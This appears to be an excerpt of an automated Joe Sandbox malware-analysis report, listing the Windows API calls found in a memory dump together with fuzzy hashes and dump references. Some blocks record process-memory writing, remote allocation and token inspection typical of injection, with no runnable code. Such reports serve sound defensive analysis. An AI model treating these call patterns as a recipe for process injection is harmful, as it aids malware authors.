                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EC0570,80070057,?,?), ref: 00EC0675
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EC0570,80070057,?,?), ref: 00EC0683
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EC0570,80070057,?), ref: 00EC0693
                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EC0570,80070057,?,?), ref: 00EC069F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                                                                                      • Opcode ID: d8399c6028d16e0b57d7fa8a46607d27ff908eb174bb2b36aee779d2901a61cc
                                                                                                                                                                                                                                      • Instruction ID: 17af30d788a39079102cd4837c2dee8d1543a22a4998232b7602edebc74c040f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8399c6028d16e0b57d7fa8a46607d27ff908eb174bb2b36aee779d2901a61cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B01BC72600204EFDB015F15CD08FAA7EAEEBC4792F104028F945F2210D772CE119BA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00ECF0B9
                                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00ECF0C7
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00ECF0CF
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00ECF0D9
                                                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 00ECF115
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                                                                                      • Opcode ID: cb0aba3f76dffccf001b8504a3005d70644bc546b56c34b1e82d3a706d836448
                                                                                                                                                                                                                                      • Instruction ID: 2c626df2b067f9afc08f9dd1b049f0e124b4468d5e79f65613667975e4ae1118
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb0aba3f76dffccf001b8504a3005d70644bc546b56c34b1e82d3a706d836448
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D501C031C06119DBCF00AFE5ED49AEDBB7AFF0DB10F045069E501B2151CB309A58C761
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC179E
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00EC1225,?,?,?), ref: 00EC17AA
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00EC1225,?,?,?), ref: 00EC17B9
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00EC1225,?,?,?), ref: 00EC17C0
                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC17D7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 842720411-0
                                                                                                                                                                                                                                      • Opcode ID: 40473eee9b6649a9a17b345f67f51011590f4e92d82758e9d3b764669cc41aaf
                                                                                                                                                                                                                                      • Instruction ID: bbba75d20978f6bfb878f6a29a789e114f5d35fd07e2a3335b4a5b76ac73527a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40473eee9b6649a9a17b345f67f51011590f4e92d82758e9d3b764669cc41aaf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD0181B5201205BFDB115FA6DC49E6A3F6EEFC6364B210459F945E3260DA31DC41DA60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC16B4
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC16C0
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC16CF
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC16D6
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC16EC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                      • Opcode ID: 840de13f3230f2dea9abd68949e475536bef2cd3b351e3308f69e7f96af7a321
                                                                                                                                                                                                                                      • Instruction ID: 12b6f7c484e8a904e7034499e843ee4e60ae6e1d00c050dfd0a1fdafb8f81cff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 840de13f3230f2dea9abd68949e475536bef2cd3b351e3308f69e7f96af7a321
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4F04975205301AFDB110FA6EC49FA63FAEEFCA764F140414FA45E72A0CE71D845DA60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC1654
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC1660
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC166F
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC1676
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC168C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                      • Opcode ID: 7e7261acf735114ab2a5bd068e6e60a7a78ae77a5a42785c8f3727a045101670
                                                                                                                                                                                                                                      • Instruction ID: ee4378c0b05bd1d9ba81e9d3af96beba7e895659c5cc2d3b53f130f9d2391e93
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e7261acf735114ab2a5bd068e6e60a7a78ae77a5a42785c8f3727a045101670
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EF0A975204301AFDB210FA69D49FAA3FAEEFCA764F100414FA09E72A1CA31DC01CA60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00ED092F,?,00ED3B4C,?,00000001,00EA2A82,?), ref: 00ED0AD6
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00ED092F,?,00ED3B4C,?,00000001,00EA2A82,?), ref: 00ED0AE3
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00ED092F,?,00ED3B4C,?,00000001,00EA2A82,?), ref: 00ED0AF0
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00ED092F,?,00ED3B4C,?,00000001,00EA2A82,?), ref: 00ED0AFD
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00ED092F,?,00ED3B4C,?,00000001,00EA2A82,?), ref: 00ED0B0A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00ED092F,?,00ED3B4C,?,00000001,00EA2A82,?), ref: 00ED0B17
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: 0ec5629ebb3c8aaa2ab67ae0919a797bcad037bb8f9b1988c489ff214de54cf8
                                                                                                                                                                                                                                      • Instruction ID: dbd064a7da26866999a3bcffad954c364ab6d9b1c77e7ddcf7e7d8a58af7f738
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ec5629ebb3c8aaa2ab67ae0919a797bcad037bb8f9b1988c489ff214de54cf8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84019071805B159FC730AF66D880816FAF9EF502193199A3FD19662A21C7B0A949DF80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00EC62F6
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EC630D
                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00EC6325
                                                                                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00EC6341
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00EC635B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                                                                                      • Opcode ID: 846a8ba59f031726f5a31d55a8a1ed2efe425007091d8554bdf7bde588ab2392
                                                                                                                                                                                                                                      • Instruction ID: 97c350a1c856577a990a60a3f58172cb39c179ef4cbbc529a117951c709d3b48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 846a8ba59f031726f5a31d55a8a1ed2efe425007091d8554bdf7bde588ab2392
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C018170504704ABEB215B29DE4EFA67BB9FB80B05F00155DF586B10E1DBF1A949CA90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 00E797DA
                                                                                                                                                                                                                                      • StrokeAndFillPath.GDI32(?,?,00EB77F3,00000000,?,?,?), ref: 00E797F6
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00E79809
                                                                                                                                                                                                                                      • DeleteObject.GDI32 ref: 00E7981C
                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 00E79837
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2625713937-0
                                                                                                                                                                                                                                      • Opcode ID: df6a6bd0dfed7ae767e26abc86127a6206e13e7b9b6fba7ed34e13f10fd8c259
                                                                                                                                                                                                                                      • Instruction ID: 3a82722ea32d72bc8a751f0c73a55923e125c6e9ac100bed4b929286d4c3ec05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df6a6bd0dfed7ae767e26abc86127a6206e13e7b9b6fba7ed34e13f10fd8c259
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DF0B630006208EFDB695F69ED0CB683FA7BB41336F049215E469650B1CB31899AFF11
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00ED6E89
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F00CE0,00000000,00000001,00F00B50,?), ref: 00ED6EA0
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00ED7124
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                      • API String ID: 948891078-24824748
                                                                                                                                                                                                                                      • Opcode ID: c0d0e7d108606b35340e8dddaf94736252fb00d0df730a6e04ca844841746258
                                                                                                                                                                                                                                      • Instruction ID: e78e4393417044018d56c4b919756c96f6ea91fab31c3371b44c64a2a19ab489
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0d0e7d108606b35340e8dddaf94736252fb00d0df730a6e04ca844841746258
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19D15B71608301AFC304EF24D88196BB7E9FF94748F00595DF595AB261DB71ED0ACB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ECCDA4
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ECCE52
                                                                                                                                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00ECCE80
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$Default
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 1306138088-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 398be217f8c8e4404f54e9e07b1b47d54e8d15b73a5729eb6e3e7f9cd6e58867
                                                                                                                                                                                                                                      • Instruction ID: 0bd172c38ec24ed6117cbbd83124bdc1a8906e4772a430c35838a3e0f2bb3866
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 398be217f8c8e4404f54e9e07b1b47d54e8d15b73a5729eb6e3e7f9cd6e58867
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF51D1716043009FD7549F28CA44F7BBBE8AB46328F24292EF99DF2190E772CD469752
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Q$pS
                                                                                                                                                                                                                                      • API String ID: 0-898496266
                                                                                                                                                                                                                                      • Opcode ID: 8cc098a7d1e697935ccd69f2a3d058dd6c8994ddb4daeb7b38d9f9e3f3f10430
                                                                                                                                                                                                                                      • Instruction ID: dd7c477977b203d414edc5c76ce4038b7f8863c3d071b344cf074175f62d7102
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cc098a7d1e697935ccd69f2a3d058dd6c8994ddb4daeb7b38d9f9e3f3f10430
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B519172E10609ABDF12AFA8C845FEF7BB8AF49324F142059F418B7291D7759E01CB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ECBAB9: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EC285A,?,?,00000034,00000800,?,00000034), ref: 00ECBAE3
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EC2DEA
                                                                                                                                                                                                                                        • Part of subcall function 00ECBA84: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EC2889,?,?,00000800,?,00001073,00000000,?,?), ref: 00ECBAAE
                                                                                                                                                                                                                                        • Part of subcall function 00ECB9E0: GetWindowThreadProcessId.USER32(?,?), ref: 00ECBA0B
                                                                                                                                                                                                                                        • Part of subcall function 00ECB9E0: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EC281E,00000034,?,?,00001004,00000000,00000000), ref: 00ECBA1B
                                                                                                                                                                                                                                        • Part of subcall function 00ECB9E0: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EC281E,00000034,?,?,00001004,00000000,00000000), ref: 00ECBA31
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EC2E57
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EC2EA4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
